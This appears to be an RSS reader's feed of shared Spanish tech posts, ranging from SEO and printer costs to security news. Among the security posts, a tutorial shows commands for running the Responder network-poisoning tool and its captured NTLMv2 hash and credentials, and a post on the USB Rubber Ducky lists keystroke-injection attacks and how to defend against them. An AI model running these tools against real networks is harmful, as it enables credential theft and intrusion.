Shared posts

24 Jun 11:39

Cómo crear la página de inicio adecuada para usuarios internacionales

by Equipo de Calidad de Búsqueda

Si tienes un negocio en más de un país o segmentas tu contenido en distintos idiomas, te recomendamos que tengas sitios o secciones independientes con contenido específico en cada URL, segmentado para países o idiomas concretos. Por ejemplo, una página para visitantes de EE. UU. y anglófonos y otra página para usuarios de Francia y francófonos.Aunque disponemos de información sobre la administración de sitios multirregionales y multilingües, la página de inicio puede ser un poco especial. Esta entrada te ayudará a crear la página de inicio adecuada en tu sitio web para publicar el contenido correcto para los usuarios en función de su idioma y ubicación.

Hay tres formas de configurar la página de inicio o la página de destino para cuando los usuarios acceden a ella:
  • mostrar el mismo contenido para todos los usuarios,
  • permitirles escoger,
  • publicar contenido en función de la localización y del idioma de los usuarios.
Echemos un vistazo a los detalles de cada opción.

Mostrar el mismo contenido a los usuarios de todo el mundo

Con esta opción, tú decides publicar contenido específico para un país y un idioma determinados en la página de inicio o en la URL genérica (http://www.example.com). Este contenido estará disponible para cualquier usuario que haya accedido a esta URL directamente en el navegador o para aquellos que busquen específicamente esa URL. Tal como se indica más arriba, se debería poder acceder a todas las versiones de país e idioma en sus URL únicas.


Nota: Puedes mostrar un banner en la página para sugerir una versión más adecuada a los usuarios de otras ubicaciones o con una configuración de idioma distinta.

Permitir a los usuarios elegir la versión local y el idioma que quieren

Con esta configuración, publicas una página de selección de país en la página de inicio o en la URL genérica para que los usuarios puedan escoger qué contenido quieren ver en función del país y del idioma. Todos los usuarios que escriban esta URL accederán a la misma página.

Si implementas esta opción en el sitio internacional, recuerda utilizar la anotación x-default rel-alternate-hreflang para la página de selección de país, que se ha creado específicamente para este tipo de páginas. El valor x-default nos ayuda a reconocer las páginas que no son específicas de un idioma ni de una región.

Redirigir automáticamente a los usuarios o publicar de forma dinámica el contenido HTML adecuado en función de su configuración de ubicación y de idioma

Una tercera opción consiste en publicar automáticamente el contenido HTML adecuado para los usuarios en función de su configuración de ubicación y de idioma. Para ello, debes utilizar redireccionamientos 302 del entorno del servidor o publicar de forma dinámica el contenido HTML adecuado.

Recuerda utilizar la anotación x-default rel-alternate-hreflang en la página de inicio o en la página genérica, aunque esta última sea una página de redireccionamiento a la que los usuarios no pueden acceder directamente.

Nota: Piensa en la opción de redirigir a los usuarios para los que no tienes una versión específica. Por ejemplo, usuarios francófonos en un sitio web que tiene versiones en inglés, español y chino. Muéstrales el contenido que consideres más adecuado.
Sea cual sea la configuración que escojas, debes asegurarte de que todas las páginas, incluidas las páginas de selección de país e idioma, cumplen lo siguiente:
  • Tienen anotaciones rel-alternate-hreflang.
  • Se encuentran accesibles para el rastreo y la indexación de Googlebot: no bloquees el rastreo ni la indexación de las páginas localizadas.
  • Permite siempre que los usuarios cambien a la versión o al idioma local. Para ello, puedes utilizar un menú desplegable.
Recordatorio: Tal como se indica al principio, recuerda que debes tener URL distintas para cada versión de país y de idioma.

Acerca de las anotaciones rel-alternate-hreflang

Recuerda anotar todas tus páginas, sea cual sea el método que utilices. Ello permitirá que los motores de búsqueda muestren los resultados adecuados a tus usuarios fácilmente.

Todas las páginas de selección de país y las páginas de inicio de publicación dinámica o que redirigen deberían utilizar x-default hreflang, que se ha diseñado específicamente para las páginas de inicio y las páginas de selección de país de redireccionamiento automático.

Por último, aquí tienes algunos recordatorios generales sobre las anotaciones rel-alternate-hreflang:
  • Tus anotaciones deben confirmarse desde las otras páginas. Si la página A enlaza con la página B, la página B tiene que volver a enlazar con la página A. De lo contrario, es posible que las anotaciones no se interpreten correctamente.
  • Las anotaciones deben hacer referencia a sí mismas. La página A debería utilizar los enlaces de la anotación rel-alternate-hreflang para sí misma.
  • Puedes especificar las anotaciones rel-alternate-hreflang en el encabezado de HTTP, en la sección del encabezado del HTML o en un archivo de sitemap. Es muy recomendable que elijas solo una forma de implementar las anotaciones para evitar incoherencias y errores.
  • El valor del atributo hreflang debe estar en formato ISO 639-1 para el idioma y en ISO 3166-1 Alpha 2 para la región. No puedes especificar solo la región. Si deseas configurar tu sitio solo para un país, utiliza la función de orientación geográfica en Herramientas para webmasters de Google.
Si sigues estas recomendaciones, podremos entender mejor tu contenido localizado y ofrecer resultados más relevantes a tus usuarios en los resultados de búsqueda. Como siempre, si tienes preguntas o comentarios, háznoslos llegar en el Foro de ayuda para webmasters.

Escrito por Zineb Ait Bahajji webmaster trend analysits. Publicado por Javier Pérez equipo de calidad de búsqueda.



23 Jun 11:29

Soluciones de pago por uso o nuestra propia impresora, ¿qué es más rentable para la pyme?

by Carlos Roberto

Soluciones de pago por uso o nuestra propia impresora Uno de los costes que hay que atacar en las empresas es el relativo a la impresión de documentos. Aquí por lo general nos encontramos con muchas alternativas y hoy vamos a ver qué es más rentable para la pyme, las soluciones de pago por uso o nuestra propia impresora.

El objetivo es lograr que el coste por copia impresa sea el más bajo posible. A esto le tendríamos que sumar una política de ahorro de número de copias impresas que haga que disminuya el coste total, no sólo teniendo en cuenta el número de páginas que hemos imprimido.

Me compro mi impresora

En este caso la empresa decide invertir en su propia impresora, lo que le obliga a realizar un desembolso mayor. A cambio la impresora tendrá una vida útil que podemos explotar sin importar cuantas copias hemos sacado. Puede ser una opción muy rentable si cuidamos bien la impresora y tenemos maña para retirar un atasco de papel, por ejemplo, sin que se queden restos en su interior.

Aquí tendríamos que sumar los costes de los consumibles, pero también del servicio técnico, que tendrá que actuar más a medida que la impresora va cumpliendo años y lleva un mayor número de páginas impresas en su historial. Por este motivo suele ser la opción elegida cuando la empresa tiene su propio servicio técnico.

Impresoras obsoletas

Una forma de evitar que las impresoras de queden obsoletas así como tener que realizar un desembolso inicial fuerte es acudir a un modelo de renting, por el que pagamos una cantidad mensual por nuestra impresora y finalizado el contrato decidimos si nos la quedamos o buscamos otra más moderna.

Servicios de pago por copia realizada

Pagamos por página impresa una cantidad en función del tipo de impresora que hemos elegido. Las impresoras de gama más alta son las que tienen un coste más elevado, mientras que las más básicas tendrán un coste menor. También varía en función del número de páginas, aplicando descuentos a medida que el número de páginas impresas es mayor.

El mantenimiento y reparación de las impresoras corre por cuenta del prestador del servicio. Por lo general se dan dos tipos de contratos:

  • Con los consumibles incluidos donde además del mantenimiento nos facilitarán todos los consumibles de la impresora. Suele ser un poco más caro que el otro modelo,

  • Los consumibles los paga el cliente de manera que si se acaba el tóner de la impresora tenemos que adquirir uno nuevo. La ventaja de este modelo es que el coste por página es más bajo.

La ventaja de este modelo es que tenemos más o menos unos costes de impresión fijos, lo que nos permitirá no tener que hacer grandes inversiones iniciales, además de tener el mantenimiento de la máquina solucionado, lo que muchas veces es un ahorro si no tenemos servicio técnico propio.

Comparando costes entre ambos modelos

Cuanto más nos dure la impresora en buen estado más rentable es tenerla en propiedad

Para realizar esta comparación necesitamos saber de forma aproximada el número de impresiones que realizamos de forma anual. En el caso de coste por uso es muy sencillo porque solo tenemos que multiplicarlo por el coste de cada página.

En el caso de que hayamos adquirido nuestra propia impresora tendríamos que dividir el coste de la impresora entre cinco, poniendo que este sea su periodo de vida útil. A esto le tenemos que sumar los costes de los consumibles, y aquí prestar atención no sólo al tóner, sino también al kit de mantenimiento que necesitan muchas impresoras pasado un determinado número de copias, el fusor u otros elementos que se pueden considerar también fungibles por parte de la marca.

Por último tendríamos que sumarle un número de horas determinado de servicio técnico, que aumentará como hemos comentado a medida que la impresora sea más vieja. Aquí es interesante ver el tipo de empleados que tiene nuestra empresa, ya que en ocasiones puede hacer que este valor se dispare si no hacen un buen uso de la impresora.

En Tecnología Pyme | Tres opciones para reducir el coste de impresión en la empresa

Imagen | Pixabay 1 & 2

-
La noticia Soluciones de pago por uso o nuestra propia impresora, ¿qué es más rentable para la pyme? fue publicada originalmente en Tecnologiapyme por Carlos Roberto.








17 Jun 07:04

Cuando las marcas protegen sus activos: Ikea pide la retirada de Ikeahackers.net

Es de sobra conocido que las principales marcas a nivel mundial quieren proteger sus activos. Y precisamente uno de los más valiosos en determinados casos es precisamente ese, sus marcas. Un buen ejemplo de esta protección es el de Ikea, que en los últimos meses ha enviado varias cartas a otras webs cuyos nombres contienen la palabra ikea para pedir su retirada.

El caso más conocido hasta la fecha es el de IkeaHackers, una web en la que se publican ideas de cómo hackear los productos de la compañía, aportando nuevas ideas y creando una comunidad en torno a la marca sueca. Pues bien, Ikea se puso en contacto con los administradores de la web hace unos meses, pidiendo el cese de su actividad y la transmisión del dominio ikeahackers.net a la empresa.

LEER MAS: http://www.genbeta.com/web/cuando-las-marcas-protegen-sus-activos-ikea-pide-la-retirada-de-ikeahackers-net
17 Jun 07:03

La Agencia Tributaria registra una treintena de establecimientos que utilizan...

La Agencia Tributaria ha completado una actuación de gran envergadura en relación con establecimientos del sector del calzado y el textil que utilizaban programas informáticos para ocultar una porción relevante de sus ventas, que podría llegar hasta el 30% de la facturación real. Las empresas investigadas concentraban las prácticas defraudatorias en las operaciones de efectivo, que hacían desaparecer parcialmente de la contabilidad, a diario y a su voluntad, para rebajar sensiblemente los ingresos, a efectos de la tributación por el Impuesto sobre Sociedades.

El operativo, desarrollado ayer de manera simultánea en nueve comunidades autónomas (Andalucía, Aragón, Baleares, Cantabria, Castilla y León, Cataluña, La Rioja, Madrid y Comunidad Valenciana) en el marco de la operación ‘Scarpe’, ha llevado al registro de los sistemas informáticos existentes en 29 establecimientos pertenecientes a 11 sociedades.

Mediante este acceso directo a los equipos informáticos de los establecimientos registrados se espera obtener los datos reales de actividad y ventas de las empresas en los últimos ejercicios para poder determinar las cuotas defraudadas gracias al empleo de programas informáticos que permitían llevar una doble contabilidad con ocultación parcial de las operaciones.

LEER MAS: http://www.agenciatributaria.es/AEAT.internet/Inicio/_componentes_/_Notas_de_prensa/La_Agencia_Tributaria_registra_una_treintena_de_establecimientos_que_utilizan_programas_informaticos_para_ocultar_ventas.shtml
17 Jun 07:02

Version 2.0 of the Field Service App is there: Have a look and feel the difference!

by Martin Ortgiess

The Exact Field Service App is already used by many customers today. Statistics show that more and more service oriented organizations equip their service engineers with an iPad rather than paper files. They have seen the benefits of linking the activities of their service engineers directly in the back-office. It allows them to approve the activity for invoicing, send a confirmation email to the client when the job has been done and always have an update planning ready for the engineer. Also all stock movements made by the engineer are directly managed in the back-office and never lose track of a signed service order again!

service order

Version 2.0 of the Field Service App offers new features and an improved user interface. Most obvious changes are:

  • A new activity can be created from the service order. This way the engineer can send a message to the internal organization when he thinks there is a need for it. This can be that maintenance of a machine is very poor, that he sees an opportunity to replace the existing machine by another one or to request the planner to plan a follow-up appointment at the customer side. Note that user cannot create a new service activity.
  • The Field Service App can be secured by the use of a pin code. In the setting, the engineer can define his pin code. Now every time the App is used, a pin code needs to be filled in first.
  • The user interface has been adjusted. Goal is to make the service order screen easier to use. This has been done by cleaning up the screen and offer only that information the engineer needs most. Note that all information is still there, only not directly in your face.
  • Get informed when an item you want to add to the service order is blocked (only available with latest PU 252 update)

Besides these new features there are hundreds of small adjustments in this version of the Field Service App. Some adjustments are visible, most are not. Have a look and feel the difference!

important: As mentioned, a lot of changes have been made in the App. The communication with the Synergy back-office is improved and fully runs via web services now, just like the other new Apps that are launched this year. Because of this change it is required to open up the web services in your Synergy back-office. You can do this in the Web services settings menu, located in the System tab. Check the ‘Exclude web services function rights’ setting and make sure all checkboxes in the right column are checked. When this is done run an IISreset and you’re save and done! The ‘Exclude web services function rights’ setting allows users to use the web services mentioned in the right column based on their Synergy roles and rights.

16 Jun 11:31

Cómo reembolsar una app después de los 15 minutos reglamentarios

by Manuel Ramírez

Reembolsar una app después de los 15 minutos

Muchos usuarios sabréis que en el momento que compráis una aplicación en la Play Store tenéis 15 minutos para que se os reembolse de nuevo el precio de la app si por lo que fuera no habéis quedado contentos con la adquisición. Una acción bastante fácil de realizar después de haber comprado la nueva app, ya que desde la misma Play Store tenéis el botón de reembolsar.

Tenemos que tener en cuenta que con ciertas apps estos 15 minutos pueden quedar en muy pocos si tenemos que descargar una importante cantidad de datos debido a que estemos ante una aplicación que tenga 1GB o más. Hay una manera de poder reembolsar el dinero de la aplicación que finalmente no nos ha convencido. A continuación os enseñamos como realizar ese reembolso si habéis pasado los 15 minutos reglamentarios.

Google ahora tiene un proceso automático para reembolsaros las aplicaciones después de estos primeros 15 minutos. Desde Android Police han encontrado que Google tiene una franja de tiempo de 48 horas después de la compra sin tener que mediar con el desarrollador como si sucedía anteriormente, cuando había que contactar con él para que nos reembolsaran la cantidad de la app.

Hay que tomar en cuenta que estamos ante un sistema que a bien seguro que Google tiene herramientas para aquellos que intenten usarlo regularmente para hacer un uso indebido de él.

Cómo reembolsar una app después de los 15 minutos reglamentarios

  • Lo primero que debéis hacer es ir, desde vuestro ordenador, a la tienda de aplicaciones de Google Play a “Mis pedidos”

Google Play 01

  • En las últimas compras realizadas veréis un icono con tres puntos el cual debéis pulsar “Informar de un problema” en la app seleccionada

Google Play 02

  • Del menú seleccionáis “quiero solicitar un reembolso”

Google Play 03

  • Solicitáis el reembolso

Una importante ayuda para aquellos usuarios que no podrán disfrutar de un juego y no tuvieron el tiempo necesario para comprobarlo en la franja de tiempo disponible para el reembolsarlo. Y recordar que es un sistema del cual no se puede abusar ya que Google pondrá trabas.

El artículo Cómo reembolsar una app después de los 15 minutos reglamentarios ha sido originalmente publicado en Androidsis.








11 Jun 08:59

Grave bug en GnuTLS pone en peligro a los clientes SSL Linux

by noreply@blogger.com (Vicente Motos)
El bug (CVE-2014-3466) fue descubierto independientemente por Joonas Kuorilehto de la firma de seguridad Codenomicon, la misma empresa de seguridad que descubrió la mayor vulnerabilidad de Internet: Heartbleed. Eso sí, a diferencia de Heartbleed, la biblioteca GnuTLS no está tan ampliamente desplegada como OpenSSL.

La vulnerabilidad en GnuTLS reside en la forma que analiza el identificador de sesión de la respuesta del servidor durante el handshake TLS. El problema es que no comprueba la longitud del valor del identificador de sesión en el mensaje ServerHello, lo que permitiría a un atacante enviar un valor excesivamente largo con el fin de ejecutar un desbordamiento de búfer:


El fallo sólo puede ser explotado mediante el envío de payloads maliciosos desde el servidor a los clientes que establecen conexiones HTTPS cifradas.

Ya existe una prueba de concepto para esta vulnerabilidad que afecta a varios sistemas operativos basados en Linux y cientos de paquetes de software. Por suerte, el proyecto GNUTLS ha publicado las versiones 3.1.25 , 3.2.15 y 3.3.3 para parchear la vulnerabilidad.

Fuentes:

- GnuTLS Flaw Leaves SSL Clients Vulnerable to Remote Code Execution
- Bug in GnuTLS allows hackers to run malicious code in Your Linux
- Critical bug in GnuTLS crypto library could allow malicious code execution
- Technical Analysis Of The GnuTLS Hello Vulnerability * grandes!
- Linux hit by GnuTLS exploit, follows Heartbleed model
11 Jun 08:59

Analiza las bases de datos SQLite de tu smartphone Android con ADEL (Android Data Extractor Lite)

by noreply@blogger.com (Vicente Motos)
ADEL (Android Data Extractor Lite) es un script en Python que vuelca todas las bases de datos SQLite de un smartphone Android a disco y analiza los archivos en un workflow forense.

Si el smartphone no está conectado se puede especificar un directorio que contenga las bases de datos a analizar. Después, el script creará un informe XML claramente estructurado. Si conectas el smartphone necesitarás que esté rooteado y un kernel inseguro o un recovery personalizado.

Ejemplo de uso de ADEL con un smartphone conectado:
adel.py -d device -l 4

Ejemplo de uso de ADEL con copias de seguridad de bases de datos:
adel.py -d /home/user/backup -l 4

ADEL necesita una configuración predefinida para que cada dispositivo funcione correctamente. Esta configuración se debe añadir en el siguiente archivo:
xml/phone_configs.xml

Como ejemplo han añadido la configuración para el Samsung Galaxy S2 con Android 2.3.3. Más adelante seguirán añadiendo más configuraciones telefónicas.

En el estado actual de desarrollo, las bases de datos que se tratan y analizan son:

- información telefónica y de la tarjeta SIM (por ejemplo, IMSI y el número de serie)
- directorio telefónico y las listas de llamadas
- entradas del calendario
- mensajes SMS
- localizaciones GPS de diferentes fuentes en el smartphone

ADEL ahora usa una imagen de recuperación personalizada basada en el ClockworkMod-Recovery. Gracias a esto ya no es necesario modificar el kernel o el demonio adb. Por otra parte, en algunos smartphones más nuevos se puede cargar la recuperación modificada en la RAM mediante fastboot, por lo que no será necesario hacer cualquier cambio que persista en el smartphone.

Repositorio GitHub del proyecto: https://github.com/mspreitz/ADEL
11 Jun 08:58

Millones de televisiones inteligentes vulnerables al ataque del "botón rojo"

by noreply@blogger.com (Vicente Motos)
En un intento de llevar las funciones modernas de Internet de banda ancha (broadband) a la televisión abierta tradicional (broadcast), el consorcio Digital Video Broadcasting (DVB) presentó una especificación denominada Hybrid Broadcast Broadband-Television (HbbTV), que permite a los streams de difusión incluir contenido HTML incrustado que se renderiza por la televisión.

HbbTV (televisión conectada o híbrida) se ha convertido en un estándar de TV para transmitir contenidos adicionales de Internet por el televisor. Este sistema ya se encuentra ampliamente desplegado en Europa y recientemente ha sido adoptado como parte de la norma de televisión digital de Estados Unidos. 

Para recibir las páginas web especialmente diseñadas en formato CE-HTML se necesita una conexión a Internet y un televisor que soporte esta tecnología o un receptor de HbbTV adicional. La mayoría de estos dispositivos incluyen en sus mandos de control remoto un "botón rojo" para acceder a estos servicios interactivos.
 
Sin embargo este "botón rojo" podría ser también una puerta para usuarios malintencionados. Yossi Oren y Angelos Keromytis de la Universidad de Columbia han publicado un paper en el que demuestran que los sistemas de broadband y broadcast se combinan de forma insegura.

El problema principal es que cuando se inserta contenido web en un stream de datos de broadcast no está enlazado a ningún servidor web por lo que no puede establecer de forma estándar una política del mismo origen de forma estándar. La especificación HbbTV sugiere que sea el propio stream de broadcast quien defina su propio origen web configurando el nombre de dominio deseado (propiedad simple_application_boundary_descriptor en el IAT). Por lo tanto, si el propio proveedor o broadcaster puede especificar cualquier origen, un proveedor malicioso podrá también inyectar cualquier script de su elección en cualquier sitio web de su elección.
 
Aprovechándose de ésto y mediante un ataque MITM a gran escala, se inyectan comandos sobre la base de la frecuencia de radio (RF) y, junto con los streams de audio y video, se puede incluir una aplicación HbbTV maliciosa.

Aunque los autores de esta técnica intentaron una divulgación responsable ante el organismo de normalización, el ataque fue visto como demasiado caro y con limitada rentabilidad de los atacantes. Sin embargo en su artículo se demuestra que la complejidad técnica y el presupuesto requeridos son bajos, por lo que este ataque es práctico y realista, sobre todo en las zonas con alta densidad de población -en una densa zona urbana, un atacante con un presupuesto de alrededor de 400€ puede dirigirse a más de 20.000 dispositivos en un solo ataque-.

Además, cuando una aplicación HbbTV ha comenzado a ejecutarse no hay manera estándar de pararla, al menos que se cambie de canal, se apague la televisión o se desactive el soporte HbbTV en su totalidad. Para más inri, estos ataques son casi "invisibles": las aplicaciones HbbTV se ejecutan en segundo plano sin el conocimiento ni el consentimiento de los usuarios y el atacante no necesita usar una IP o un DNS por lo que la única manera de cogerle sería triangulando la señal maliciosa...

Fuentes:
- Yossef Oren, Angelos D. Keromytis: From the Aether to the Ethernet - Attacking the Internet using Broadcast Digital Television
- Red Button Flaw Exposes Major Vulnerability In Millions of Smart TVs
- Millions of Smart TVs Vulnerable To 'Red Button' Attack
- A New Vulnerability Could Leave Smart TVs Exposed
11 Jun 08:58

Responder: despliega servidores falsos en la red para robar contraseñas

by noreply@blogger.com (Vicente Motos)
Responder de SpiderLabs es una herramienta para la obtención pasiva de credenciales en la red.

Todo está escrito en Python pensando en la portabilidad, por lo que no será necesario instalar ninguna herramienta extra ni añadir ningún módulo adicional.

Lo ejecutas y escucha peticiones NBT-NS (NetBIOS Name Service), LLMNR (Link-local Multicast Name Resolution) y mDNS (multicast Domain Name System) y envenena al emisor. Cuando detecta una petición basada en el nombre del sufijo (ver: http://support.microsoft.com/kb/163409) solicitará y almacenará las credenciales de la víctima.

Responder además viene con varios servidores de autenticación falsos (HTTP/SMB/MSSQL/FTP/LDAP) que soportan NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP básica.

Veámos un poco su facilidad de uso en una máquina virtual con Kali:

Instalación:
root@kali:~# git clone https://github.com/SpiderLabs/Responder.git

root@kali:~# cd Responder/
root@kali:~/Responder# ls
Certs                FixInternet.exe   LDAPPackets.py       Responder.py
CHANGELOG            HTTPCookies       odict.py             SMBPackets.py
Denied.html          HTTPPackets.py    RAPLANMANPackets.py  SMBRelay.py
DHCP.py              HTTPProxy.py      README.md            SMTPPackets.py
Fingerprint.py       Icmp-Redirect.py  RelayPackets.py      SQLPackets.py
FingerprintRelay.py  IMAPPackets.py    Responder.conf

Ejemplo de uso:
root@kali:~/Responder# python Responder.py -i 192.168.142.128 -I eth0 -d SMB -b 0 -r 1 -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: eth0
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF

Captura de hash SMB-NTLMv2:
LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]WPAD (no auth) file sent to: 192.168.142.1

LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]SMB-NTLMv2 hash captured from :  192.168.142.1
[+]SMB complete hash is : prueba::DOMINIO:1122334455667788:1D863E3C5746398740BBD893B1F7B43B:01010000000000684CF017068466D9E239FD90000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E0061006C000500160C006F00630061006C000073006D006200310032002E00680030003000000000000000010000000020009E00000C5EC24000A0F2F627F8D95AAB1740E16A2D24BE1C9B0E222697E60D026DBF5C5C006C006F00634C3451030A001000000000000000000000000000000000000900120063006900660073002F006500760061006E000000000000000000

Captura de credenciales FTP:
[[+]FTP User:  test
[+]FTP Password is:  test

Captura de credenciales HTTP/HTTPS:
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test

[+]HTTPS-User & Password: test:test

Captura LDAP:
[LDAP]Clear Text User & Password is: :

Repositorio en Github: https://github.com/Spiderlabs/Responder
05 Jun 10:52

Emdoor presenta una tablet Windows 8.1 por 100 dólares

Estamos acostumbrados a que sean las tablet Android las que tengan precios ajustadísimos, pero una nueva tablet de 8″ con Windows 8.1 desarrollada por Emdoor, promete traernos un precio realmente competitivo de sólo 100 dólares.

¿Qué podemos esperar por este precio? Pues de momento la tablet Emdoor EM-i8080 cuenta con una pantalla IPS de 8″ de resolución1.280 x 800, a la que acompañará un procesador Intel Atom Bay Trail Z3735G, además de 1GB de RAM y 16GB de memoria interna.

LEER MAS: http://www.theinquirer.es/2014/06/04/emdoor-presenta-una-tablet-windows-8-1-por-100-dolares.html
05 Jun 08:46

USB Rubber Ducky: Un teclado malicioso como un pendrive

by noreply@blogger.com (Maligno)
En el mundo de la seguridad informática hay todavía empresas, administradores y usuarios comunes que no han tomado conciencia de la importancia que tiene la seguridad física, un punto clave a tener muy en cuenta. Siempre hay gente que quiere robarle la contraseña a su pareja, a su jefe, a su empleado, espiar tu historial de sitios que visitas en Internet, las cookies del Facebook, robarte los passwords de la red WiFi, o robar documentos como hizo Edward Snowden con los documentos de la NSA. Supongo que las listas de correos que recibo con esas peticiones os deberían servir de muestra más que suficiente de con quién os jugáis los cuartos.

Existen técnicas y maneras de conseguir acceso físico a un equipo y explotar las vulnerabilidades, y lo único que hay que hacer es forzar los condicionantes adecuados para poder llevarlo a cabo. Perder de vista el equipo o prestarlo a un amigo un momento para revisar las novedades de algún blog, o separarte de tu escritorio por unos momentos para ir al lavabo, es tiempo suficiente para que un atacante pueda llegar y enchufar un dispositivo como el “USB Rubber Ducky”.

Este dispositivo es un teclado programado con forma de USB que nada más conectarse comienza a escribir en el equipo de forma automatizada, para lanzar programas y herramientas que bien pueden estar en el equipo víctima o cargados en la memoria Micro SD que lleva incluida.

Figura 1: Estructura de USB Rubber Ducky

En cuestión de segundos tendría acceso a información que se podría subir automáticamente a un servidor FTP u otro sitio. Algo parecido a lo que se explicaba con USB Dumper, pero al revés, es decir, en lugar de ser el servidor el malicioso que roba los datos del USB, sería USB Rubber Ducky el que robaría los datos al equipo.

En este vídeo de ejemplo que hizo TorresCrack248  se puede ver como en cuatro segundos se puede robar la contraseña del administrador de la computadora, lanzando con USB Rubber Ducky un script basado en Mimikatz que acceda a los datos.


Figura 2: Vídeo demostrativo del uso de USB Rubber Ducky

¿Qué es USB Rubber Ducky?

Casi todos los sistemas operativos de computadoras portátiles, tablets o smartphones permiten la comunicación con el usuario a través de los teclados USB. Es por eso que hay una especificación en el estándar USB ubicua conocida como HID (Human Interface Device) – o dispositivo de interfaz humana. En pocas palabras, cualquier sistema operativo al que conectemos el USB Rubber Ducky lo detectara y será bien aceptado automáticamente como si se hubiera conectado un teclado, ya sea en Windows, OS X, Linux o Android.

Al final, el teclado sigue siendo un interfaz fundamental y lo que hará USB Rubber Ducky es "teclear comandos" en el sistema como si lo estuviera haciendo el usuario que se ha conectado a la sesión. Usando un sencillo lenguaje de programación y un editor de texto podríamos compilar un binario que automatice diversos “payloads” con lo cual podríamos realizar ataques en cuestión de segundos.

Figura 3: Estructura interna de USB Rubber Ducky

Con una idea similar, el libro de Hacking iOS se explica cómo usando un Teensy 3.0, en lo que se basa USB Rubber Key, se simula un teclado por USB para iPad para lanzar un ataque de fuerza bruta porque no hay protección de número de intentos para el teclado y se rompe el passcode de un iPad - uno de los muchos trucos de saltarse el passcode de iPhone & iPad.


Figura 4: Ataque de fuerza bruta al passcode de un iPad con Teensy 3.0
Debido a su estructura, los sistemas operativos ofrecen una confianza inherente a las pulsaciones del teclado, por lo tanto los dispositivos que abusan de la interfaz HID no pueden ser detectados por las contramedidas tradicionales de forma sencilla ya que iría contra la filosofía Plug&Play de los sistemas. Esto hace que sea una herramienta muy útil en procesos de pentesting internos, ataques de ingeniería social del tipo "¿me puedes imprimir un documento?" o de auténticos atacantes de dentro de la organización.

¿Qué ataques se pueden realizar?

Al final, cuando un usuario pincha un USB Rubber Ducky en su sesión de usuario es como si le hubiera dejado el teclado al atacante para que este ejecutase lo que quisiera. Es decir, este ataque se aprovecha de la confianza del usuario, que al final siempre es “el eslabón mas débil” o de la seguridad física de muchos equipos expuestos.

¿Cuántos de ustedes han llegado a alguna oficina gubernamental, banco y tienen a simple vista y acceso a los puertos USB de los equipos? ¿A cuántos de ustedes les han prestado algún equipo para revisar el correo, las redes sociales, etcétera? ¿Cuántos no tienen en la oficina un equipo de un compañero con cuentas de diferentes administradores o que tenga más permisos que el resto? ¿Cuántas veces no has visto un puerto USB en un Kiosco de Internet o un Punto de Información? Si ninguno de esos puertos bloquea el interfaz HID, puedes hacer el ataque. Al final quizás agregar, subirlas a un servidor FTP en cuestión de segundos.

Seguro que os ha tocado llegar a una oficina a resolver tramites y la persona que te atendió tuvo que salir un par de minutos, y esto es tiempo suficiente para un atacante enchufar el USB Rubber Ducky y lanzar el payload - en lugar de hacer un David Hasselhoff para robar las passwords -Por mencionar algunos ataques brevemente:
Recolección de información del sistema operativo.
* Robar información importante de los navegadores de Internet.
* Robar y usar las cookies de las sesiones abiertas.
* Hacer capturas de pantalla del escritorio y carpetas importantes del sistema.
* Robar y utilizar las contraseñas de las conexiones WiFi de la víctima.
* Subir la información a traves un servidor FTP.
 Ataques dirigidos al sistema:
* Agregar usuarios con permisos administrativos al equipo de la víctima.
* Borrar usuarios del sistema.
* Hacer Pharming de DNS.
* Infección del sistema descargando y ejecutando un binario de Internet.
* Crackear passwords del administrador en el sistema.
* Crear un Backdoor WiFi.
* Bloquear programas en el sistema operativo de forma sigilosa.
¿Cómo podemos protegernos de estos ataques?

Desde que el grupo de hackers de Hack5 hizo pública la herramienta, algunos siguen pensando que desactivando el “autoplay” de los discos USB podrían detenerlo, pero esto no es posible hacerlo de esa manera ya que el ataque no sea hace vía un USB de almacenamiento sino como si alguien estuviera tecleando en un teclado USB.

Las formas que se puede utilizar para detectar que un USB es realmente un HID USB, se puede hacer un script en PowerShell que enumere la lista de dispositivos HID que alerte cuando uno nuevo se haya conectado y se bloquee. Aquí hay información sobre cómo acceder a la lista de los dispositivos desde PowerShell. A partir de ese punto, la forma en la que quieres estar protegido depende de ti.

En el trabajo de Adrian Crenshaw, titulado "Plug & Prey: Malicious USB devices" que fue presentado en la ShmooCON 2011 se explica en detalle la lista de posibles ataques que se pueden hacer por USB. Entre ellos, por supuesto, los teclados USB que abusan de la interfaz HID. Aquí tenéis el vídeo para ver la conferencia.

Figura 5: Plug & Prey - Malicious USB Devices

En el trabajo se presta especial atención a los PHUKD (Programmable HID USB Keyboard/Mouse Dongle) ya que no solo simulando un teclado malicioso es el problema, y la simulación de un ratón malicioso que hiciera clics en zonas concretas sería igual de peligroso. Para proteger los USB utilizando las políticas GPO de Windows hay que tener en cuenta que si el usuario que pincha el USB Rubber Ducky es una administrador, siempre podrá cambiar la política, pero lo dificultaría. Esto hace que fuera factible, dentro de una política de Maximizar la seguridad de un Windows, usar listas blancas de los dispositivos USB que se pueden conectar a un equipo.

